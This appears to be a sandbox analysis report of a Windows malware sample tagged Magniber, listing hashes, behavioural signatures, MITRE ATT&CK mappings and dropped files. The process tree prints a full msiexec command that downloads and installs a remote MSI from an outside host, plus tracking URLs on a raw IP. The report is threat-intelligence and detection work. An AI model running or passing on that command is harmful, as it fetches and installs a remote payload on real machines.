a55a9448ff32d81c1e877441288329d454506879520b3986d8a5a27696097e27

General

Target

2024-09-07_59a860015808c75e2d9ea84c5d431370_magniber.exe
Size

1.4MB
MD5

59a860015808c75e2d9ea84c5d431370
SHA1

77f02a0b6f4f31ed1d5eb6cbd80e99e0ab85874a
SHA256

a55a9448ff32d81c1e877441288329d454506879520b3986d8a5a27696097e27
SHA512

6a043d0ec35b793212bcbea528757b9b08ff0688f8b0285f7c11d3f09c7514d3b6e904563783b8f9d9ea2a73736220ffda68f409b4a0445b4594763da91a208e
SSDEEP

24576:gaQUobv0I2jh3z8jlVDqsMmuk9f9BrYINvrhFolKyy0GKMAa3cmxP2yUc7jAM/:ga2Ujhj8xV+49f9FLNTbolKd06NRJUcJ

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2944	~dyd0wy78dh.tmp

Loads dropped DLL 1 IoCs

pid	Process
2132	2024-09-07_59a860015808c75e2d9ea84c5d431370_magniber.exe

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
2492	MSIEXEC.EXE

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-09-07_59a860015808c75e2d9ea84c5d431370_magniber.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	~dyd0wy78dh.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSIEXEC.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2492	MSIEXEC.EXE
Token: SeIncreaseQuotaPrivilege	2492	MSIEXEC.EXE

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2492	MSIEXEC.EXE
2492	MSIEXEC.EXE

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2132 wrote to memory of 2944	2132	2024-09-07_59a860015808c75e2d9ea84c5d431370_magniber.exe	28
PID 2132 wrote to memory of 2944	2132	2024-09-07_59a860015808c75e2d9ea84c5d431370_magniber.exe	28
PID 2132 wrote to memory of 2944	2132	2024-09-07_59a860015808c75e2d9ea84c5d431370_magniber.exe	28
PID 2132 wrote to memory of 2944	2132	2024-09-07_59a860015808c75e2d9ea84c5d431370_magniber.exe	28
PID 2132 wrote to memory of 2944	2132	2024-09-07_59a860015808c75e2d9ea84c5d431370_magniber.exe	28
PID 2132 wrote to memory of 2944	2132	2024-09-07_59a860015808c75e2d9ea84c5d431370_magniber.exe	28
PID 2132 wrote to memory of 2944	2132	2024-09-07_59a860015808c75e2d9ea84c5d431370_magniber.exe	28
PID 2944 wrote to memory of 2492	2944	~dyd0wy78dh.tmp	29
PID 2944 wrote to memory of 2492	2944	~dyd0wy78dh.tmp	29
PID 2944 wrote to memory of 2492	2944	~dyd0wy78dh.tmp	29
PID 2944 wrote to memory of 2492	2944	~dyd0wy78dh.tmp	29
PID 2944 wrote to memory of 2492	2944	~dyd0wy78dh.tmp	29
PID 2944 wrote to memory of 2492	2944	~dyd0wy78dh.tmp	29
PID 2944 wrote to memory of 2492	2944	~dyd0wy78dh.tmp	29

C:\Users\Admin\AppData\Local\Temp\2024-09-07_59a860015808c75e2d9ea84c5d431370_magniber.exe
"C:\Users\Admin\AppData\Local\Temp\2024-09-07_59a860015808c75e2d9ea84c5d431370_magniber.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2132
- C:\Users\Admin\AppData\Local\Temp\~dyd0wy78dh.tmp
  "C:\Users\Admin\AppData\Local\Temp\~dyd0wy78dh.tmp"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2944
- - C:\Windows\SysWOW64\MSIEXEC.EXE
    MSIEXEC.EXE /i "http://pliuht.cdnpckgs.eu/client/pkgs/manhattanslots/Manhattan Slots20160825044747.msi" DDC_DID=588842 DDC_RTGURL=http://www.cdnfile.eu/dl/TrackSetup/TrackSetup.aspx?DID=588842 DDC_UPDATESTATUSURL=http://190.4.95.131:8080/manslots/Lobby.WebServices/Installer.asmx DDC_SIGNUPURL=http://190.4.95.131:8080/manslots/Lobby.WebSite/SignUpUnsecure.aspx SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp" SETUPEXENAME="~dyd0wy78dh.tmp"
    3⤵
    - Use of msiexec (install) with remote resource
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:2492

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_is4964.tmp

Filesize
1KB

MD5
03c0196c2504a3838426107feb5aaa11

SHA1
5c9064f5760e2e92da53fcb05805fee33f24629d

SHA256
c068f5f4dc6be2c5688df94a201b12ff916763c3717f931fab825a5ef179fea8

SHA512
c810b4c6e567fbcac5f6aa30466d411e730ab5666ca122a84cc0938fd9545646cb5e17f842dec4f59121a57d45d680e7d301f9506b96f2b59c627007f3396f8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\{A07C0F27-C343-4A50-94D9-9253A2DF7A79}\0x0409.ini

Filesize
21KB

MD5
be345d0260ae12c5f2f337b17e07c217

SHA1
0976ba0982fe34f1c35a0974f6178e15c238ed7b

SHA256
e994689a13b9448c074f9b471edeec9b524890a0d82925e98ab90b658016d8f3

SHA512
77040dbee29be6b136a83b9e444d8b4f71ff739f7157e451778fb4fccb939a67ff881a70483de16bcb6ae1fea64a89e00711a33ec26f4d3eea8e16c9e9553eff

Download Submit
C:\Users\Admin\AppData\Local\Temp\{A07C0F27-C343-4A50-94D9-9253A2DF7A79}\_ISMSIDEL.INI

Filesize
20B

MD5
db9af7503f195df96593ac42d5519075

SHA1
1b487531bad10f77750b8a50aca48593379e5f56

SHA256
0a33c5dffabcf31a1f6802026e9e2eef4b285e57fd79d52fdcd98d6502d14b13

SHA512
6839264e14576fe190260a4b82afc11c88e50593a20113483851bf4abfdb7cca9986bef83f4c6b8f98ef4d426f07024cf869e8ab393df6d2b743b9b8e2544e1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\~4952.tmp

Filesize
5KB

MD5
6e225fe01634d6ea9b16e0cfc6e83deb

SHA1
551a54d943e18c28af8258bb0ce909c8788a40a0

SHA256
0678e43e2a4c5b03b04de1348180a3773b8828d814f5d96ec79e8e2cbe2dfa8b

SHA512
8964290224f6ea58a896435b70a1e92557d3a4a64cb8deea1012841e3b5bf0307fb569ec8147ccf4c25a77265612d399a96503db350e74292b0ea9747aeb9a72

Download Submit
\Users\Admin\AppData\Local\Temp\~dyd0wy78dh.tmp

Filesize
1.2MB

MD5
ab3a7035da439b0b327aa9f992943f78

SHA1
c3167418366df3eee86c5b22bbcbfec3f659abba

SHA256
e627e5bc43ce5492f3f2aaee38f1ae3244a9616fdc6572b7ffe4f3898ff2df5e

SHA512
03802f656e5ee511b8f85ae2da6d2d0e7fe303d01b650abd6fcc3236f5c915d2e985f4715c29ea30f54acab0a8458e4280244d4af0e9b7e2a8b4c1e8fd0f3a6f

Download Submit

Analysis

Sharing